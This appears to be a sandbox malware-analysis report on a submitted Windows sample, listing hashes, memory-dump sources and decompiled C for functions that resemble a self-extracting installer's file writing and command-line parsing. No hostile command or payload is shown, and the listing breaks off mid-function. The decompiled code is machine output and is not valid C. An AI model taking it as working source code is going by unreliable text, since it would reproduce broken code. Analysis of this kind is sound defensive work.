Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eed2fc9838f798ef175d0533031ffaded3f065299279f146f9003f3c57fa1f9a
Instruction ID: 8e75ebb47ec13a04155aaea2ab1a75823f5deb8acef0a3cedeb734b32e887c62
Opcode Fuzzy Hash: eed2fc9838f798ef175d0533031ffaded3f065299279f146f9003f3c57fa1f9a
Instruction Fuzzy Hash: B9014BA3E1167126F32660294C88FB7555CCB96734F1B0375FDAAE79D1D6654C0483E0

Uniqueness

Uniqueness Score: -1.00%

Function 00384AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00384AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x38858c; // 0x268
				_t9 = E00383680(_t20);
				if( *0x3891d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x388d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x389400; // 0x110000
							_t15 = _t14 + _t25;
							 *0x389400 = _t15;
							if( *0x388184 != 0) {
								_t21 =  *0x388584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3893f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00384ad5
0x00384adb
0x00384ae7
0x00384aee
0x00384b05
0x00384b0d
0x00384b14
0x00384b1a
0x00384b1c
0x00384b21
0x00384b2a
0x00384b2f
0x00384b31
0x00384b39
0x00384b54
0x00384b54
0x00384b39
0x00384b2f
0x00384b0f
0x00384b0f
0x00384b0f
0x00384b5e
0x00384ae9
0x00384aed
0x00384aed

APIs

Part of subcall function 00383680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0038369F
Part of subcall function 00383680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003836B2
Part of subcall function 00383680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003836DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00384B05

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 60778bf1d39b982d4d5f46a5e9fc902068b611e2b7f1fecbc240a39429f25c85
Instruction ID: 75a702e1ec61bfe803adbc98e7646b6678840cec51fde4ca2777b77ea6d4adf8
Opcode Fuzzy Hash: 60778bf1d39b982d4d5f46a5e9fc902068b611e2b7f1fecbc240a39429f25c85
Instruction Fuzzy Hash: AD01D231240306ABDB179F58DC05BA2775CF744725F0A82A6F9399B5E0CB70C811CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0038658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0038658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x388b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x388b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E003816B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00386592
0x00386594
0x00386596
0x00386598
0x00386598
0x0038659b
0x0038659b
0x0038659d
0x0038659e
0x003865a2
0x003865a4
0x003865a9
0x003865b2
0x003865b6
0x003865ba
0x003865c3
0x003865c5
0x003865c8
0x003865c8
0x003865c3
0x003865c9
0x003865cc
0x003865d2
0x003865d1
0x003865d1
0x00000000
0x003865dc
0x00000000

APIs

CharPrevA.USER32(00388B3E,00388B3F,00000001,00388B3E,-00000003,?,003860EC,00381140,?), ref: 003865BA

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: f60102e021bb35bbdea89c281924d2b059f54dc958b667484dcc26606512963b
Instruction ID: 644a99e913c733a39f257a479630ac18578dc472c66d0946aa7de9cd755151e3
Opcode Fuzzy Hash: f60102e021bb35bbdea89c281924d2b059f54dc958b667484dcc26606512963b
Instruction Fuzzy Hash: 32F04C321043509BD733291D9885B67BFDE9B87350F2901EEE8DAC3205DA658C4683A4

Uniqueness

Uniqueness Score: -1.00%

Function 0038621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0038621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x388004; // 0xb25159a8
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0038597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E003844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x389124 = E00386285();
					_t9 = 0;
				}
				return E00386CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00386229
0x00386230
0x00386247
0x0038626a
0x00386272
0x00386249
0x00386255
0x0038625f
0x00386264
0x00386264
0x00386284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0038623F

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 21982a4a1f9218383efc71e96bcb56450b8706037a3ccdae58409d3e8b09af9c
Instruction ID: 175bac47a831f4578c3ce1ee42abee421348505311b54a9e38f04b4b9b5c7f1a
Opcode Fuzzy Hash: 21982a4a1f9218383efc71e96bcb56450b8706037a3ccdae58409d3e8b09af9c
Instruction Fuzzy Hash: 1CF05EB0644308ABEB52FB749D07BBE76BCDB54700F4004EAA986DE191EE7499448750

Uniqueness

Uniqueness Score: -1.00%

Function 00384B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00384B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x388d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x388d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x388d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x388d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x388d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x388d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x388d6c)) = 0;
				return 0;
			}

0x00384b66
0x00384b74
0x00384b98
0x00384ba0
0x00000000
0x00384bac
0x00384ba4
0x00000000
0x00384ba4
0x00384b78
0x00384b7e
0x00384b84
0x00384b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00384FA1,00000000), ref: 00384B98

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4940aaff82b6fc5edc2af4673c42e28a1e10ebd1a6c4eac26bb881906bef6aaf
Instruction ID: 2dfd1645e1c44f1897077e9970cd196ac5b0e151cbe4344aedb800e4e273662e
Opcode Fuzzy Hash: 4940aaff82b6fc5edc2af4673c42e28a1e10ebd1a6c4eac26bb881906bef6aaf
Instruction Fuzzy Hash: 17F01971540B099E8773EF79CC10552BFE8AA9536036009AEB4AED2591EF309446DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 003866AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003866AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x003866b1
0x003866ba
0x003866c7
0x003866bc
0x003866be
0x003866be

APIs

GetFileAttributesA.KERNELBASE(?,00384777,?,00384E38,?), ref: 003866B1

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cc4aa4889e09a665decc26172d0d9e15fb3a6013405c0742fb67d072934477bf
Instruction ID: 2383e649aaa903db1bb6090799f1de1985d383e01e4d6e4bb429f4957d4547d1
Opcode Fuzzy Hash: cc4aa4889e09a665decc26172d0d9e15fb3a6013405c0742fb67d072934477bf
Instruction Fuzzy Hash: 61B092B6222A80426A2216316C2A5562845B6C133ABE51BD5F032C01E0DA3EC846D204

Uniqueness

Uniqueness Score: -1.00%

Function 00384CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00384CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00384caa
0x00384cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00384CAA

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6729bec4b443afc3c50e0d7ff9010fae4ba84770f1e310921334aa63a6dd0d22
Instruction ID: f161e1108c90608f5a0bb179b0dd7ac3860f2f58d0067528d2cd5891eabdddd2
Opcode Fuzzy Hash: 6729bec4b443afc3c50e0d7ff9010fae4ba84770f1e310921334aa63a6dd0d22
Instruction Fuzzy Hash: F9B0123204430CB7DF011FC2EC09F853F1DE7C4761F240041F60C450508A7294108796

Uniqueness

Uniqueness Score: -1.00%

Function 00384CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00384CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00384cc8
0x00384ccf

APIs

GlobalFree.KERNELBASE ref: 00384CC8

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 83989c11a07bf4c49e94ec6904fddfa36be53f4c5c13f286032b75746f50c457
Instruction ID: 42b33cef5ad6ad73561fd108a9981df92b8474caf5b656170ea44488e5a6d4c3
Opcode Fuzzy Hash: 83989c11a07bf4c49e94ec6904fddfa36be53f4c5c13f286032b75746f50c457
Instruction Fuzzy Hash: 96B0123100020CB78F011B42EC088453F1DD6C0360B000051F50C451218B3398118685

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00385C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00385C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x388004; // 0xb25159a8
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00386CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00386E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x388004; // 0xb25159a8
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0038597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E003844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x389124 = E00386285();
									_t75 = 0;
								}
								return E00386CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E003844B9(0, 0x521, 0x381140, 0, 0x40, 0);
												_t85 =  *0x388588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0038667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0038667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00385C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00381680(0x388c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0038667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0038667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x388a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00385C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x388b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x388a3a;
																}
																E00381680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0038658A(_t218, 0x104, 0x381140);
																if(E003831E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x388a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x388a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x388a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x388a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x388a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x389a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x389a2c =  *0x389a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x388d48 =  *0x388d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x389a2c =  *0x389a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x389a2c =  *0x389a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x388d48 =  *0x388d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x389a2c =  *0x389a2c | 0x00000004;
																										L70:
																										 *0x388a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x389a2c = 3;
																	 *0x388a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x388a2c != 0 &&  *0x388b3e == 0) {
						if(GetModuleFileNameA( *0x389a3c, 0x388b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E003866C8(0x388b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00385c9e
0x00385ca9
0x00385cb0
0x00385cb3
0x00385cb6
0x00385cb7
0x00385cb8
0x00385cbd
0x00386204
0x00385ccb
0x00000000
0x00385ccb
0x00385cd3
0x00385cd7
0x00385cf4
0x00000000
0x00385cf4
0x00385cf8
0x00385d00
0x00000000
0x00385d06
0x00385d06
0x00385d0e
0x00385d10
0x00385d12
0x00385d14
0x00385d15
0x00385d17
0x00385d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00385d19
0x00385d19
0x00385d1d
0x00000000
0x00385d3f
0x00385d3f
0x00385d4b
0x00385d4b
0x00385d4f
0x00385d8d
0x00000000
0x00385d93
0x00385d93
0x00385d9a
0x00385d9d
0x00385d9e
0x00000000
0x00385d9e
0x00385d51
0x00385d5b
0x00385d72
0x003860fb
0x003860fb
0x00386207
0x0038620a
0x0038620b
0x0038620e
0x00386217
0x00385d78
0x00385d78
0x00385d80
0x00385d83
0x00385d84
0x00000000
0x00385d84
0x00385d5d
0x00385d5f
0x00385d62
0x00385d68
0x00385d64
0x00385d64
0x00385d64
0x00000000
0x00385d62
0x00385d5b
0x00385d4f
0x00385d1d
0x00000000
0x00385d9f
0x00385d9f
0x00385da5
0x00385dab
0x00385dba
0x00386218
0x0038621d
0x00386220
0x00386221
0x00386229
0x00386230
0x00386247
0x0038626a
0x00386272
0x00386249
0x00386255
0x0038625f
0x00386264
0x00386264
0x00386284
0x00385dc0
0x00385dc0
0x00385dca
0x00385e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00385dcc
0x00385dce
0x00385e24
0x00385e24
0x00385e2c
0x00385e47
0x00385e4a
0x003861d2
0x003861e2
0x003861e7
0x003861ee
0x003861f1
0x003861f1
0x003861f8
0x003861f8
0x00385e50
0x00385e53
0x00386109
0x0038611f
0x00000000
0x00386125
0x00386137
0x0038613a
0x0038613c
0x0038613e
0x0038613e
0x00386141
0x00386141
0x00386143
0x00386144
0x0038614a
0x00000000
0x00386150
0x00386152
0x0038615c
0x00386170
0x00386172
0x0038617c
0x00386190
0x00386190
0x00386196
0x003861a5
0x00000000
0x003861ab
0x003861b9
0x003861c6
0x003861c6
0x0038617e
0x00386180
0x0038618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0038618a
0x0038615e
0x00386160
0x0038616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0038616a
0x0038615c
0x0038614a
0x0038610b
0x0038610e
0x0038610e
0x00000000
0x00385e59
0x00385e59
0x00385e5c
0x0038604f
0x00386056
0x00000000
0x0038605c
0x0038606e
0x00386071
0x00386073
0x00386075
0x00386075
0x00386078
0x00386078
0x0038607a
0x0038607b
0x00386081
0x00000000
0x00386087
0x00386087
0x0038608d
0x0038609c
0x00000000
0x003860a2
0x003860aa
0x003860b2
0x003860b7
0x003860bd
0x003860bf
0x003860bf
0x003860d6
0x003860e0
0x003860e7
0x003860f5
0x00000000
0x00000000
0x00000000
0x00000000
0x003860f5
0x0038609c
0x00386081
0x00385e62
0x00385e62
0x00385e65
0x00385fd3
0x00385fe9
0x00000000
0x00385fef
0x00385fef
0x00385ff7
0x00385ffd
0x00386003
0x00386006
0x00386011
0x00386014
0x0038603d
0x00386016
0x00386018
0x00386019
0x0038601b
0x00386033
0x0038601d
0x00386020
0x00386029
0x00386022
0x00386022
0x00386022
0x00386020
0x0038601b
0x00386042
0x00386044
0x00386046
0x0038604a
0x00385ff7
0x00385fd5
0x00385fd8
0x00385fd8
0x00000000
0x00385e6b
0x00385e6b
0x00385e6e
0x00385f8b
0x00385f99
0x00000000
0x00385f9f
0x00385fa7
0x00385faf
0x00000000
0x00385fb1
